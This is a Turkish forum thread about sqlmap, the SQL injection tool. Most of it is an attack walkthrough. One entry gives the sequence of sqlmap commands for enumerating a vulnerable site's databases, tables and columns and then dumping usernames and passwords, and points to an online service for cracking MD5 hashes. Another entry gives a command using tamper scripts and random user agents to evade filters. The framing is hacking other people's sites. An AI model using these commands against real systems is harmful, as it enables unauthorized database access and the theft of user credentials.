tümü

sqlmap

  1. 1.
    0
    python ile yazılmış olan web sitelerinde sql injection açığı olup olmadığını sorgulamaya yarayan güvenlik şeysi http://sqlmap.org/
    ···
    #154211814 şikayet
  1. 2.
    0
    sql injection olan sitede yapacağınız ilk hackleme yöntemidir
    sqlmap.py diye çağırılır
    sqlmap.py -u http://www.siteadi.com/index.php?id=1 --dbs < tablolar çekilir

    database çekildiyse tamam onun içindekini istiyorum diyorsunuz ve database adlarından tabloları çekiyorsunuz
    sqlmap.py -u http://www.siteadi.com/index.php?id=1 -D ÖrnTablo_inci --tables

    evet tablolarıda çektik şimdi kolonları çekiyoruz,dikkat ederseniz yaptığım şeyi onaylamak için kısaltıyorum.
    sqlmap.py -u http://www.siteadi.com/index.php?id=1 -D ÖrnTablo_inci -T username,şifre,mail --columns

    kolonlarda geldi şimdi kolonların içindeki şifreleri dumpluyoruz yani çıkartıyoruz

    sqlmap.py -u http://www.siteadi.com/index.php?id=1 -D ÖrnTablo_inci -T username,password --dump
    evet şifreler kullanıcı adları ve mail görünüyor

    izleyeceğimiz şey dbs>tabless>columns>dump
    eğer şifre md5liyse otomatik program kırıyor, eğer uğraşmıycam diyorsanız hızlı olması için hashkiller sitesini kullanabilirsiniz.
    ···
    #159105625 şikayet
  2. 3.
    0
    kullanmayi bilen varmi lan
    ···
    #186050930 şikayet
  3. 4.
    0
    sqlmapda tamperdata kullanmak ileri düzey hack bilgisi gerektirir --dbms "MySql" -v3 --technique U ile u tekniği mysqlde saldırı tipini belirler -v 4 ise daha seri fakat myssql de işe yarar mysql için en sağlam tamper space2comment iken myssqlde randomcasedir.
    tamper kullanımı örnek olarak sqlmap -u http://site.com --dbms "MySql" -v3 --technique=BEUQ --level=3 --risk=3 --hex --user-agent --random-agent --tamper=space2comment --dbs şeklindedir. sorusu olan
    ···
    #189541528 şikayet